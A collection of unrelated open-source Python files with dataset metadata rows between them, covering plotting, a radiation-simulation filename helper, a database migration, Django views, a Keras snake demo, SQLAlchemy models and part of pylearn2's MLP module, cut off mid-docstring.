fig.savefig(os.path.join(out_dir + '/{}.png'.format(sp))) if out_format == 'pdf_one': pdf.savefig() plt.close() if out_format == 'pdf_one': pdf.close() return def plot_each_query(species, queries, out_dir, out_format, plot_species, ttot, **kwargs): ''' Description: This method creates plots for each species, plotting timecourse curves from each query separately. Input: species - a dictionary mapping strings to Species objects. queries - a list of query objects. out_dir - the path to the output directory. out_format - the file format for output figures. plot_species - a list containing species names to be plotted. default is to generate plots for all species. ttot - the total length of simulation. ''' if plot_species[0] is 'all': plot_species = species.keys() for query in queries: if out_format == 'pdf_one': pdf = PdfPages( os.path.join( out_dir + '/{}.pdf'.format(query.name))) for sp in plot_species: fig = plt.figure() plt.plot(query.t, query.concentrations[:, species[sp].index]) plt.title('{}, {}'.format(sp, query.name)) plt.ylabel('Concentration (uM)') plt.xlabel('Time (seconds)') plt.xticks(np.arange(0, ttot+1, ttot/2)) plt.grid(True) if out_format == 'pdf_mult': pdf = PdfPages( os.path.join( out_dir + '/{}_{}.pdf'.format( query.name, sp))) pdf.savefig() pdf.close() if out_format == 'png': fig.savefig( os.path.join( out_dir + '/{}_{}.png'.format( query.name, sp))) if out_format == 'pdf_one': pdf.savefig() plt.close() if out_format == 'pdf_one': pdf.close() return
apache-2.0
3,636,057,399,998,828,000
30.333333
78
0.533824
false
4.091518
false
false
false
Iwan-Zotow/runEGS
XcIO/names_helper.py
1
2104
# -*- coding: utf-8 -*- EGSPHAN_EXT = ".egsphant" EGSINP_EXT = ".egsinp" EGSPHSF_EXT = ".egsphsp1" def make_cup_prefix(radUnit, outerCup, innerCupSer, innerCupNum): """ Makes filename prefix given RU, OC, IC info Parameters ---------- radUnit: string radiation unit outerCup: string outer cup info innerCupSer: string inner cup serial line innerCupNum: integer inner cup number returns: string clinical cup name """ return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum def make_qualified_name(file_prefix, cl, shot): """ Makes qualified name Parameters ---------- file_prefix: string prefix with RU and cup info cl: collimator collimator info shot: (float,float) tuple shot position returns: string fully qualified cup name """ return file_prefix + str(cl) + "_" + "Y{0}Z{1}".format(int(shot[0]),int(shot[1])) def make_egsinput_name(full_prefix): """ Makes EGS input name """ return full_prefix + EGSINP_EXT def parse_file_prefix(s): """ Parse file prefix string and produce rad.unit, outer cup, inner cup, inner cup number, collimator """ radUnit = str(s[1:2]) outerCup = str(s[3:4]) innerCupSer = str(s[5:6]) innerCupNum = str(s[6:8]) coll = int(str(s[9:11])) return (radUnit, outerCup, innerCupSer, innerCupNum, coll) def parse_shot(s): """ Parse input string to extract shot """ idx_shot = s.find("_") if idx_shot < 0: raise ValueError("No shot info in input") sh = s[idx_shot+1:] idx_Y = sh.find("Y") if idx_Y < 0: raise ValueError("No Y shot position in input") idx_Z = sh.find("Z") if idx_Z < 0: raise ValueError("No Z shot position in input") sh_Y = sh[idx_Y+1:idx_Z] sh_Z = sh[idx_Z+1:] return (float(sh_Y), float(sh_Z))
apache-2.0
574,515,979,374,324,900
21.147368
101
0.565589
false
3.140299
false
false
false
openstack/manila
manila/db/migrations/alembic/versions/344c1ac4747f_add_share_instance_access_rules_status.py
1
4287
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Remove access rules status and add access_rule_status to share_instance model Revision ID: 344c1ac4747f Revises: dda6de06349 Create Date: 2015-11-18 14:58:55.806396 """ # revision identifiers, used by Alembic. revision = '344c1ac4747f' down_revision = 'dda6de06349' from alembic import op from sqlalchemy import Column, String from manila.common import constants from manila.db.migrations import utils priorities = { 'active': 0, 'new': 1, 'error': 2 } upgrade_data_mapping = { 'active': 'active', 'new': 'out_of_sync', 'error': 'error', } def upgrade(): """Transform individual access rules states to 'access_rules_status'. WARNING: This method performs lossy converting of existing data in DB. """ op.add_column( 'share_instances', Column('access_rules_status', String(length=255)) ) connection = op.get_bind() share_instances_table = utils.load_table('share_instances', connection) instance_access_table = utils.load_table('share_instance_access_map', connection) # NOTE(u_glide): Data migrations shouldn't be performed on live clouds # because it will lead to unpredictable behaviour of running operations # like migration. instances_query = ( share_instances_table.select() .where(share_instances_table.c.status == constants.STATUS_AVAILABLE) .where(share_instances_table.c.deleted == 'False') ) for instance in connection.execute(instances_query): access_mappings_query = instance_access_table.select().where( instance_access_table.c.share_instance_id == instance['id'] ).where(instance_access_table.c.deleted == 'False') status = constants.STATUS_ACTIVE for access_rule in connection.execute(access_mappings_query): if (access_rule['state'] == constants.STATUS_DELETING or access_rule['state'] not in priorities): continue if priorities[access_rule['state']] > priorities[status]: status = access_rule['state'] # pylint: disable=no-value-for-parameter op.execute( share_instances_table.update().where( share_instances_table.c.id == instance['id'] ).values({'access_rules_status': upgrade_data_mapping[status]}) ) op.drop_column('share_instance_access_map', 'state') def downgrade(): op.add_column( 'share_instance_access_map', Column('state', String(length=255)) ) connection = op.get_bind() share_instances_table = utils.load_table('share_instances', connection) instance_access_table = utils.load_table('share_instance_access_map', connection) instances_query = ( share_instances_table.select() .where(share_instances_table.c.status == constants.STATUS_AVAILABLE) .where(share_instances_table.c.deleted == 'False') ) for instance in connection.execute(instances_query): # NOTE(u_glide): We cannot determine if a rule is applied or not in # Manila, so administrator should manually handle such access rules. if instance['access_rules_status'] == 'active': state = 'active' else: state = 'error' # pylint: disable=no-value-for-parameter op.execute( instance_access_table.update().where( instance_access_table.c.share_instance_id == instance['id'] ).where(instance_access_table.c.deleted == 'False').values( {'state': state} ) ) op.drop_column('share_instances', 'access_rules_status')
apache-2.0
2,971,264,081,608,974,300
31.477273
76
0.642641
false
3.99534
false
false
false
michaelgichia/WeideShop
weideshop/products/views.py
1
3232
# -*- coding: utf-8 -*- # Third party stuff from django.shortcuts import render, get_object_or_404 from django.views.generic import ListView, DetailView from django.views.generic.base import TemplateView # Our stuff from .models import Product, Subcategory, Category class CategoryListView(ListView): """ Browse all products in the categories. """ models = Category template_name = 'products/category_list.html' context_object_name = "Category list" def get_queryset(self): """ Returns all categories. """ return Category.objects.get_queryset().all() class SubcategoryListView(ListView): """ Browse all products in the sub-catalogue. """ model = Subcategory template_name = 'products/subcategory_list.html' context_object_name = "Sub-Category list" category_model = Category def get_queryset(self): """ Returns all sub-categories. """ self.category = get_object_or_404(Category, category_slug = self.kwargs.get('category_slug')) return Subcategory.objects.filter(category = self.category) def get_context_data(self, **kwargs): """ Returns self.category_slug needed on the subcategory_list.html as a one of the {% url %} slug params. """ context = super(SubcategoryListView, self).get_context_data(**kwargs) context['categories'] = Category.objects.all() context['category_slug'] = self.kwargs.get('category_slug') return context class ProductListView(ListView): """ Browse products according to previous selected subcategory. """ model = Product template_name = 'products/product_list.html' context_object_name = "Product list" def get_context_data(self, **kwargs): """ Returns self.category_slug and self.subcategory)slug needed on the product_list.html as a one of the {% url %} slug params. """ context = super(ProductListView, self).get_context_data(**kwargs) # Get category_slug context['categories'] = Category.objects.all() context['category_slug'] = self.kwargs.get('category_slug') # Get subcategory_slug context['subcategories'] = Subcategory.objects.all() context['subcategory_slug'] = self.kwargs.get('subcategory_slug') return context def get_queryset(self): """ Browse all products under selected subcategory. """ self.sub_category = get_object_or_404(Subcategory, subcategory_slug = self.kwargs.get('subcategory_slug')) return Product.objects.filter(sub_category = self.sub_category) class ProductDetailView(DetailView): """ Display individual products details """ model = Product def get_object(self): """ For unknown reasons :) you must pass self.product_slug """ object = get_object_or_404(Product, product_slug=self.kwargs['product_slug']) return object class CatalogueListView(ListView): """ Display all products in the db. """ model = Product def get_queryset(self): """ Returns all categories. """ return Product.objects.get_queryset().all() class CatalogueDetailView(DetailView): """ Display individual products details """ model = Product template_name = 'products/product_detail.html' slug_field = 'product_slug' def get_object(self): """ Call the superclass """ object = super(CatalogueDetailView, self).get_object() return object
bsd-2-clause
3,212,083,904,628,984,000
23.671756
108
0.716584
false
3.409283
false
false
false
lcrees/knife
knife/_active.py
1
6481
# -*- coding: utf-8 -*- '''active knives''' from threading import local from collections import deque from contextlib import contextmanager from stuf.utils import clsname from knife._compat import loads, optimize class _ActiveMixin(local): '''active knife mixin''' def __init__(self, *things, **kw): ''' Initialize :mod:`knife`. :argument things: incoming things :keyword integer snapshots: snapshots to keep (default: ``5``) ''' incoming = deque() incoming.extend(things) super(_ActiveMixin, self).__init__(incoming, deque(), **kw) # working things self._work = deque() # holding things self._hold = deque() @property @contextmanager def _chain(self, d=optimize): # take snapshot snapshot = d(self._in) # rebalance incoming with outcoming if self._history: self._in.clear() self._in.extend(self._out) # make snapshot original snapshot? else: self._original = snapshot # place snapshot at beginning of snapshot stack self._history.appendleft(snapshot) # move incoming things to working things self._work.extend(self._in) yield out = self._out # clear outgoing things out.clear() # extend outgoing things with holding things out.extend(self._hold) # clear working things self._work.clear() # clear holding things self._hold.clear() @property def _iterable(self): # derived from Raymond Hettinger Python Cookbook recipe # 577155 call = self._work.popleft try: while 1: yield call() except IndexError: pass def _append(self, thing): # append thing after other holding things self._hold.append(thing) return self def _xtend(self, things): # place things after holding things self._hold.extend(things) return self def _prependit(self, things, d=optimize): # take snapshot snapshot = d(self._in) # make snapshot original snapshot? if self._original is None: self._original = snapshot # place snapshot at beginning of snapshot stack self._history.appendleft(snapshot) # place thing before other holding things self._in.extendleft(reversed(things)) return self def _appendit(self, things, d=optimize): # take snapshot snapshot = d(self._in) # make snapshot original snapshot? if self._original is None: self._original = snapshot # place snapshot at beginning of snapshot stack self._history.appendleft(snapshot) # place things after other incoming things self._in.extend(things) return self def _pipeit(self, knife): knife.clear() knife._history.clear() knife._history.extend(self._history) knife._original = self._original knife._baseline = self._baseline knife._out.extend(self._out) knife._worker = self._worker knife._args = self._args knife._kw = self._kw knife._wrapper = self._wrapper knife._pipe = self return knife def _unpipeit(self): piped = self._pipe piped.clear() piped._history.clear() piped._history.extend(self._history) piped._original = self._original piped._baseline = self._baseline piped._out.extend(self._out) piped._worker = self._worker piped._args = self._args piped._kw = self._kw piped._wrapper = self._wrapper self.clear() return piped def _repr(self, clsname_=clsname, list_=list): # object representation return self._REPR.format( self.__module__, clsname_(self), list_(self._in), list_(self._work), list_(self._hold), list_(self._out), ) def _len(self, len=len): # length of incoming things return len(self._in) class _OutMixin(_ActiveMixin): '''active output mixin''' def _undo(self, snapshot=0, loads_=loads): # clear everything self.clear() # if specified, use a specific snapshot if snapshot: self._history.rotate(-(snapshot - 1)) self._in.extend(loads_(self._history.popleft())) return self def _snapshot(self, d=optimize): # take baseline snapshot of incoming things self._baseline = d(self._in) return self def _rollback(self, loads_=loads): # clear everything self.clear() # clear snapshots self._clearsp() # revert to baseline snapshot of incoming things self._in.extend(loads_(self._baseline)) return self def _revert(self, loads_=loads): # clear everything self.clear() # clear snapshots self._clearsp() # clear baseline self._baseline = None # restore original snapshot of incoming things self._in.extend(loads_(self._original)) return self def _clear(self, list_=list): # clear worker self._worker = None # clear worker positional arguments self._args = () # clear worker keyword arguments self._kw = {} # default iterable wrapper self._wrapper = list_ # clear pipe self._pipe = None # clear incoming things self._in.clear() # clear working things self._work.clear() # clear holding things self._hold.clear() # clear outgoing things self._out.clear() return self def _iterate(self, iter_=iter): return iter_(self._out) def _peek(self, len_=len, list_=list): wrap, out = self._wrapper, self._in value = list_(wrap(i) for i in out) if self._each else wrap(out) self._each = False self._wrapper = list_ return value[0] if len_(value) == 1 else value def _get(self, len_=len, list_=list): wrap, out = self._wrapper, self._out value = list_(wrap(i) for i in out) if self._each else wrap(out) self._each = False self._wrapper = list_ return value[0] if len_(value) == 1 else value
bsd-3-clause
-5,760,023,825,560,073,000
28.193694
72
0.569511
false
4.314913
false
false
false
agingrasc/StrategyIA
ai/STA/Strategy/StrategyBook.py
1
1930
# Under MIT license, see LICENSE.txt """ Livre des stratégies. """ from .HumanControl import HumanControl from .SimpleDefense import SimpleDefense from .SimpleOffense import SimpleOffense from .DoNothing import DoNothing class StrategyBook(object): """ Cette classe est capable de récupérer les stratégies enregistrés dans la configuration des stratégies et de les exposer au Behavior Tree en charge de sélectionner la stratégie courante. """ def __init__(self, p_info_manager): self.strategy_book = {'SimpleDefense' : SimpleDefense, 'SimpleOffense' : SimpleOffense, 'HumanControl' : HumanControl, 'DoNothing' : DoNothing } self.info_manager = p_info_manager def get_strategies_name_list(self): return list(self.strategy_book.keys()) def ball_in_offense_zone(self): self.team_zone_side = "left" # constante bidon TODO: trouver une facon de demander au InfoManager notre zone initiale self.ball_x_position = self.info_manager.get_ball_position().x if self.team_zone_side == "left": return self.ball_x_position > 0 return self.ball_x_position < 0 def most_opponents_in_our_zone(self): pass def get_optimal_strategy(self): # simple choice if self.ball_in_offense_zone(): self.chosen_strategy = SimpleOffense else: self.chosen_strategy = SimpleDefense self.chosen_strategy = DoNothing return self.chosen_strategy def get_strategy(self, strategy_name): return self.strategy_book[strategy_name] def debug_show_all_players_tactics(self): for i in range(0,6): debug_string = "" debug_string += "Robot:" + str(i) + str(self.info_manager.get_player_tactic(i)) print(debug_string)
mit
-4,660,321,697,038,851,000
33.321429
126
0.631634
false
3.674952
false
false
false
s-macke/Kerasimo
models/snake.py
1
1336
from keras.models import Sequential, load_model from keras.layers import * from qlearning4k.games import Snake from keras.optimizers import * from qlearning4k import Agent from lib import kerasimo grid_size = 10 nb_frames = 4 nb_actions = 5 snake = Snake(grid_size) model = load_model('models/snake.hdf5') #model = Sequential() #model.add(Conv2D(16, (3, 3), activation='relu', input_shape=(nb_frames, grid_size, grid_size))) #model.add(Conv2D(32, (3, 3), activation='relu')) #model.add(Flatten()) #model.add(Dense(256, activation='relu')) #model.add(Dense(nb_actions)) #model.compile(RMSprop(), 'MSE') agent = Agent(model=model, memory_size=-1, nb_frames=nb_frames) #model.save('/tmp/snake1.hdf5') #agent.train(snake, batch_size=64, nb_epoch=10000, gamma=0.8) #model.save('/tmp/snake2.hdf5') #agent.play(snake) snake.reset() agent.clear_frames() S = agent.get_game_data(snake) game_over = False frames = list() frames.append(S[0]) while not game_over: q = model.predict(S)[0] possible_actions = snake.get_possible_actions() q = [q[i] for i in possible_actions] action = possible_actions[np.argmax(q)] snake.play(action) S = agent.get_game_data(snake) frames.append(S[0]) game_over = snake.is_over() print(np.asarray(frames).shape) kerasimo.ToSVG('snake', model, np.array(frames), showarrows=False, columns=[1,3,3,10,10,1])
mit
-1,961,486,161,902,618,600
28.688889
96
0.719311
false
2.656064
false
false
false
tasleson/lsm-ci
testing/github_event_gen.py
1
2009
""" Used for testing the service locally """ import argparse import hashlib import hmac import os import requests import json GIT_SECRET = os.getenv("GIT_SECRET", "") PORT_NUM = os.getenv("PORT_NUM", "43301") IP_ADDRESS = os.getenv("IP_ADDRESS", "127.0.0.1") def gen_signature(data): """ Generate the signature for the data. :param data: Data to generate signature for :return: "sha1=<hexdigest>" """ h = hmac.new(GIT_SECRET.encode("utf-8"), data.encode("utf-8"), hashlib.sha1) s = "sha1=" + h.hexdigest() return s.encode("utf-8") if __name__ == "__main__": parser = argparse.ArgumentParser(description="github event creation") parser.add_argument( "--clone_url", dest="clone_url", default="https://github.com/tasleson/libstoragemgmt.git", ) parser.add_argument("--branch", dest="branch", default="master") parser.add_argument( "--sha1", dest="sha1", default="4a956debabed9d02e7c076d85d1f2d18eb11b549", ) args = parser.parse_args() url = "http://%s:%s/event_handler" % (IP_ADDRESS, PORT_NUM) head = { "Content-type": "application/json", "X-Hub-Signature": "", "X-Github-Event": "pull_request", } body = dict() body["pull_request"] = dict() body["pull_request"]["base"] = dict() body["pull_request"]["head"] = dict() body["pull_request"]["base"]["repo"] = dict() body["pull_request"]["head"]["repo"] = dict() body["pull_request"]["base"]["repo"][ "full_name" ] = "libstorage/libstoragemgmt" body["pull_request"]["head"]["repo"]["clone_url"] = args.clone_url body["pull_request"]["head"]["sha"] = args.sha1 body["pull_request"]["head"]["ref"] = args.branch body_json = json.dumps(body) head["X-Hub-Signature"] = gen_signature(body_json) response = requests.post( url=url, headers=head, data=body_json.encode("utf-8") ) print("status = %d" % int(response.status_code))
apache-2.0
-6,225,019,245,875,923,000
24.75641
80
0.599303
false
3.337209
false
false
false
mfa/weight-app
weight/manage.py
1
1205
#!/usr/bin/env python """ Part of weight_app :copyright: (c) 2012 by Andreas Madsack. :license: BSD, see LICENSE for more details. """ from flask.ext.script import Manager from main import create_app, db from utils import new_pw, get_emailaddress # flask-Script manager = Manager(create_app) @manager.command def createdb(): """ Create Database (with initial user) """ import models db.create_all() add_user(u'admin', email=get_emailaddress()) @manager.command def add_user(username, email, quiet=False): """ Adds a User to the database with a random password and prints the random password. """ from models import User if User.query.get(username): print("User %s already exists!" % username) return u = User(username=username, email=email.strip()) pw = new_pw() u.set_password(pw) if not quiet: print("Password for %s set to: %s" % (username, pw)) db.session.add(u) db.session.commit() @manager.command def import_from_xml(filename, username): from utils import import_weight_from_xml import_weight_from_xml(filename, username) if __name__ == '__main__': manager.run()
bsd-3-clause
-5,661,920,201,830,214,000
23.591837
69
0.651452
false
3.554572
false
false
false
jlgoldman/writetogov
database/db_models.py
1
4654
from geoalchemy2 import Geography from sqlalchemy.dialects import postgresql from database import db from util import fips from util import text SRID = 4326 # This table is auto-generated by shp2sql based on the TIGER shapefile # tl_2016_us_cd115.zip (https://www.census.gov/cgi-bin/geo/shapefiles/index.php?year=2016&layergroup=Congressional+Districts+%28115%29). # We then augment it with additional columns for state # name and code, since by default it only includes FIPS codes. # # Table creation was initiated using: # shp2pgsql -G -s 4269:4326 tl_2016_us_cd115.shp district > district_raw.sql # # Table altered using: # ALTER TABLE district # ADD COLUMN state_name character varying(50), # ADD COLUMN state_code character varying(2), # ADD COLUMN district_code character varying(4); # CREATE INDEX idx_district_state_code ON district USING btree (state_code); # CREATE INDEX idx_district_district_code ON district USING btree (district_code); # # Then extra columns are popualted using database/populate_district_codes.py class District(db.Model): gid = db.Column(db.Integer, primary_key=True) statefp = db.Column(db.String(2), index=True) # FIPS code cd115fp = db.Column(db.String(2), index=True) # FIPS code # Added manually state_name = db.Column(db.String(50)) state_code = db.Column(db.String(2), index=True) district_code = db.Column(db.String(4), index=True) geoid = db.Column(db.String(4)) namelsad = db.Column(db.String(41)) lsad = db.Column(db.String(2)) cdsessn = db.Column(db.String(3)) mtfcc = db.Column(db.String(5)) funcstat = db.Column(db.String(1)) aland = db.Column(postgresql.DOUBLE_PRECISION) awater = db.Column(postgresql.DOUBLE_PRECISION) intptlat = db.Column(db.String(11)) intptlon = db.Column(db.String(12)) geog = db.Column(Geography('MultiPolygon', srid=SRID)) class Rep(db.Model): class Chamber(object): HOUSE = 'h' SENATE = 's' class Status(object): ACTIVE = 'a' LEFT_CONGRESS = 'l' DEFEATED_IN_GENERAL = 'd' DEFEATED_IN_PRIMARY = 'e' RETIRING = 'r' SEEKING_OTHER_OFFICE = 'o' PENDING_RESULT = 'p' rep_id = db.Column(db.Integer, primary_key=True) first_name = db.Column(db.String(100)) last_name = db.Column(db.String(100)) state_code = db.Column(db.String(2), index=True) district_number = db.Column(db.Integer, index=True) district_code = db.Column(db.String(4), index=True) party_code = db.Column(db.String(1), index=True) chamber = db.Column(db.String(1), index=True) email_link = db.Column(db.String(100)) email = db.Column(db.String(100)) website = db.Column(db.String(255)) address_dc = db.Column(db.String(255)) phone_dc = db.Column(db.String(20)) bioguide_id = db.Column(db.String(10)) status = db.Column(db.String(1), index=True) status_note = db.Column(db.String(100)) def state_name(self): return fips.get_state_name_for_code(self.state_code) def district_ordinal(self): if self.chamber == self.Chamber.HOUSE: return text.ordinal(self.district_number) if self.district_number > 0 else 'At-Large' return None class Reminder(db.Model): class Frequency(object): WEEKLY = 'w' MONTHLY = 'm' class Status(object): ACTIVE = 'a' UNSUBSCRIBED = 'u' reminder_id = db.Column(db.BigInteger, primary_key=True) email = db.Column(db.String(100), index=True) frequency = db.Column(db.String(1), index=True) status = db.Column(db.String(1), index=True) last_contacted = db.Column(db.DateTime(timezone=True), index=True) time_created = db.Column(db.DateTime(timezone=True)) time_updated = db.Column(db.DateTime(timezone=True)) class RepMailing(db.Model): rep_mailing_id = db.Column(db.BigInteger, primary_key=True) rep_id = db.Column(db.Integer, index=True) email = db.Column(db.String(100), index=True) stripe_charge_id = db.Column(db.String(50), index=True) lob_letter_id = db.Column(db.String(50), index=True) time_created = db.Column(db.DateTime(timezone=True)) time_updated = db.Column(db.DateTime(timezone=True)) class Issue(db.Model): issue_id = db.Column(db.BigInteger, primary_key=True) creator_email = db.Column(db.String(100), index=True) creator_name = db.Column(db.String(100)) title = db.Column(db.String(100)) description = db.Column(db.Text) rep_ids = db.Column(postgresql.ARRAY(db.Integer)) time_created = db.Column(db.DateTime(timezone=True)) time_updated = db.Column(db.DateTime(timezone=True))
bsd-3-clause
6,247,504,885,244,312,000
37.783333
136
0.68049
false
3.026008
false
false
false
zbraniecki/pyast
pyast/typedlist.py
1
4961
import sys import re # Temporary solution for string/unicode in py2 vs py3 if sys.version >= '3': basestring = str class TypedList(list): """Strongly typed list All elements of the list must be one of the given types. Attributes: init - initial values types - allowed types null - can the list be null Types may be either classes or strings. If types are strings then the value of the field may be only a string matching one of the types. examples: TypedList([Identifier(), Identifier()], (Identifier, Literal)) TypedList([], Expression, null=True) ast.field(["+","-","+"], ("+","-","=")) """ _type = 'class' # class | str | pattern def __init__(self, types, init=None, null=False): super(TypedList, self).__init__() if isinstance(types, basestring) or not hasattr(types, '__iter__'): self._types = (types,) else: self._types = types tset = set([type(t) for t in self._types]) self._null = null if len(tset) == 1: tset = tset.pop() self.__enforceType = self.__selectEnforcementMethod(tset) else: self.__enforceType = self.__enforceTypeMixed if init: self.extend(init) elif null is False: raise TypeError("This list must not be empty") def __repr__(self, template=None): #fields = self._fields #if len(field) >= len(list_template): # list_template += [getfillvalue(self, i)] * (len(field)-len(list_template)+1) # fields[i] = ''.join(['%s%s' % x for x in zip_longest( # list_template, # map(stringify, field), # fillvalue='' # )]) #else: # fields[i] = ', '.join(map(stringify, field)) #return self._template % fields if template is None: return list.__repr__(self) else: s = template() return s def __selectEnforcementMethod(self, t): if issubclass(t, (basestring, int)): return self.__enforceTypeStrInt elif t is re._pattern_type: return self.__enforceTypePattern elif isinstance(t, type): return self.__enforceTypeClass def __enforceTypeMixed(self, items): res = [] for item in items: et = self.__selectEnforcementMethod(type(item)) res.append(et((item,))) if all(res): return raise TypeError('This list accepts only elements: %s' % ', '.join([str(t) for t in self._types])) def __enforceTypeStrInt(self, items): if all(i in self._types for i in items): return True raise TypeError('This list accepts only elements: %s' % ', '.join([str(t) for t in self._types])) def __enforceTypeClass(self, items): if all(isinstance(i, self._types) for i in items): return True raise TypeError('This list accepts only elements: %s' % ', '.join([str(t) for t in self._types])) def __enforceTypePattern(self, items): if all(any(j.match(i) for j in self._types) for i in items): return True raise TypeError('This list accepts only elements: %s' % ', '.join([str(t) for t in self._types])) def append(self, item): self.__enforceType((item,)) return super(TypedList, self).append(item) def insert(self, pos, item): self.__enforceType((item,)) return super(TypedList, self).insert(pos, item) def extend(self, items): self.__enforceType(items) return super(TypedList, self).extend(items) def pop(self, key=-1): if self._null is False and len(self) == 1: raise TypeError("This list must not be empty") return super(TypedList, self).pop(key) def __delitem__(self, k): if self._null is False: if type(k) is slice: absslice = k.indices(len(self)) if absslice[1] - absslice[0] >= len(self): raise TypeError("This list must not be empty") elif len(self) == 1: raise TypeError("This list must not be empty") return list.__delitem__(self, k) def __setitem__(self, key, value): self.__enforceType(value if hasattr(value, '__iter__') else (value,)) return list.__setitem__(self, key, value) def __setslice__(self, i, j, sequence): self.__enforceType(sequence) return list.__setslice__(self, i, j, sequence) def __delslice__(self, i, j): absslice = slice(i, j).indices(len(self)) if self._null is False and absslice[1] - absslice[0] >= len(self): raise TypeError("This list must not be empty") return list.__delslice__(self, i, j)
bsd-3-clause
-4,534,332,588,961,025,000
33.93662
89
0.549083
false
3.994364
false
false
false
CKehl/pylearn2
pylearn2/models/mlp.py
1
166462
""" Multilayer Perceptron """ __authors__ = "Ian Goodfellow" __copyright__ = "Copyright 2012-2013, Universite de Montreal" __credits__ = ["Ian Goodfellow", "David Warde-Farley"] __license__ = "3-clause BSD" __maintainer__ = "LISA Lab" import logging import math import operator import sys import warnings import numpy as np from theano.compat import six from theano.compat.six.moves import reduce, xrange from theano import config from theano.gof.op import get_debug_values from theano.sandbox.rng_mrg import MRG_RandomStreams from theano.sandbox.cuda.dnn import dnn_available, dnn_pool from theano.tensor.signal.downsample import max_pool_2d import theano.tensor as T from pylearn2.compat import OrderedDict from pylearn2.costs.mlp import Default from pylearn2.expr.probabilistic_max_pooling import max_pool_channels from pylearn2.linear import conv2d from pylearn2.linear.matrixmul import MatrixMul from pylearn2.model_extensions.norm_constraint import MaxL2FilterNorm from pylearn2.models.model import Model from pylearn2.monitor import get_monitor_doc from pylearn2.expr.nnet import arg_of_softmax from pylearn2.expr.nnet import pseudoinverse_softmax_numpy from pylearn2.space import CompositeSpace from pylearn2.space import Conv2DSpace from pylearn2.space import Space from pylearn2.space import VectorSpace, IndexSpace from pylearn2.utils import function from pylearn2.utils import is_iterable from pylearn2.utils import py_float_types from pylearn2.utils import py_integer_types from pylearn2.utils import safe_union from pylearn2.utils import safe_zip from pylearn2.utils import safe_izip from pylearn2.utils import sharedX from pylearn2.utils import wraps from pylearn2.utils import contains_inf from pylearn2.utils import isfinite from pylearn2.utils.data_specs import DataSpecsMapping from pylearn2.expr.nnet import (elemwise_kl, kl, compute_precision, compute_recall, compute_f1) # Only to be used by the deprecation warning wrapper functions from pylearn2.costs.mlp import L1WeightDecay as _L1WD from pylearn2.costs.mlp import WeightDecay as _WD from pylearn2.sandbox.rnn.models.mlp_hook import RNNWrapper logger = logging.getLogger(__name__) logger.debug("MLP changing the recursion limit.") # We need this to be high enough that the big theano graphs we make # when doing max pooling via subtensors don't cause python to complain. # python intentionally declares stack overflow well before the stack # segment is actually exceeded. But we can't make this value too big # either, or we'll get seg faults when the python interpreter really # does go over the stack segment. # IG encountered seg faults on eos3 (a machine at LISA labo) when using # 50000 so for now it is set to 40000. # I think the actual safe recursion limit can't be predicted in advance # because you don't know how big of a stack frame each function will # make, so there is not really a "correct" way to do this. Really the # python interpreter should provide an option to raise the error # precisely when you're going to exceed the stack segment. sys.setrecursionlimit(40000) if six.PY3: LayerBase = six.with_metaclass(RNNWrapper, Model) else: LayerBase = Model class Layer(LayerBase): """ Abstract class. A Layer of an MLP. May only belong to one MLP. Parameters ---------- kwargs : dict Passed on to the superclass. Notes ----- This is not currently a Block because as far as I know the Block interface assumes every input is a single matrix. It doesn't support using Spaces to work with composite inputs, stacked multichannel image inputs, etc. If the Block interface were upgraded to be that flexible, then we could make this a block. """ # This enables RNN compatibility __metaclass__ = RNNWrapper # When applying dropout to a layer's input, use this for masked values. # Usually this will be 0, but certain kinds of layers may want to override # this behaviour. dropout_input_mask_value = 0. def get_mlp(self): """ Returns the MLP that this layer belongs to. Returns ------- mlp : MLP The MLP that this layer belongs to, or None if it has not been assigned to an MLP yet. """ if hasattr(self, 'mlp'): return self.mlp return None def set_mlp(self, mlp): """ Assigns this layer to an MLP. This layer will then use the MLP's random number generator, batch size, etc. This layer's name must be unique within the MLP. Parameters ---------- mlp : MLP """ assert self.get_mlp() is None self.mlp = mlp def get_layer_monitoring_channels(self, state_below=None, state=None, targets=None): """ Returns monitoring channels. Parameters ---------- state_below : member of self.input_space A minibatch of states that this Layer took as input. Most of the time providing state_blow is unnecessary when state is given. state : member of self.output_space A minibatch of states that this Layer took on during fprop. Provided externally so that we don't need to make a second expression for it. This helps keep the Theano graph smaller so that function compilation runs faster. targets : member of self.output_space Should be None unless this is the last layer. If specified, it should be a minibatch of targets for the last layer. Returns ------- channels : OrderedDict A dictionary mapping channel names to monitoring channels of interest for this layer. """ return OrderedDict() def fprop(self, state_below): """ Does the forward prop transformation for this layer. Parameters ---------- state_below : member of self.input_space A minibatch of states of the layer below. Returns ------- state : member of self.output_space A minibatch of states of this layer. """ raise NotImplementedError( str(type(self)) + " does not implement fprop.") def cost(self, Y, Y_hat): """ The cost of outputting Y_hat when the true output is Y. Parameters ---------- Y : theano.gof.Variable The targets Y_hat : theano.gof.Variable The predictions. Assumed to be the output of the layer's `fprop` method. The implmentation is permitted to do things like look at the ancestors of `Y_hat` in the theano graph. This is useful for e.g. computing numerically stable *log* probabilities when `Y_hat` is the *probability*. Returns ------- cost : theano.gof.Variable A Theano scalar describing the cost. """ raise NotImplementedError( str(type(self)) + " does not implement mlp.Layer.cost.") def cost_from_cost_matrix(self, cost_matrix): """ The cost final scalar cost computed from the cost matrix Parameters ---------- cost_matrix : WRITEME Examples -------- >>> # C = model.cost_matrix(Y, Y_hat) >>> # Do something with C like setting some values to 0 >>> # cost = model.cost_from_cost_matrix(C) """ raise NotImplementedError( str(type(self)) + " does not implement " "mlp.Layer.cost_from_cost_matrix.") def cost_matrix(self, Y, Y_hat): """ The element wise cost of outputting Y_hat when the true output is Y. Parameters ---------- Y : WRITEME Y_hat : WRITEME Returns ------- WRITEME """ raise NotImplementedError( str(type(self)) + " does not implement mlp.Layer.cost_matrix") def set_weights(self, weights): """ Sets the weights of the layer. Parameters ---------- weights : ndarray A numpy ndarray containing the desired weights of the layer. This docstring is provided by the Layer base class. Layer subclasses should add their own docstring explaining the subclass-specific format of the ndarray. """ raise NotImplementedError( str(type(self)) + " does not implement set_weights.") def get_biases(self): """ Returns the value of the biases of the layer. Returns ------- biases : ndarray A numpy ndarray containing the biases of the layer. This docstring is provided by the Layer base 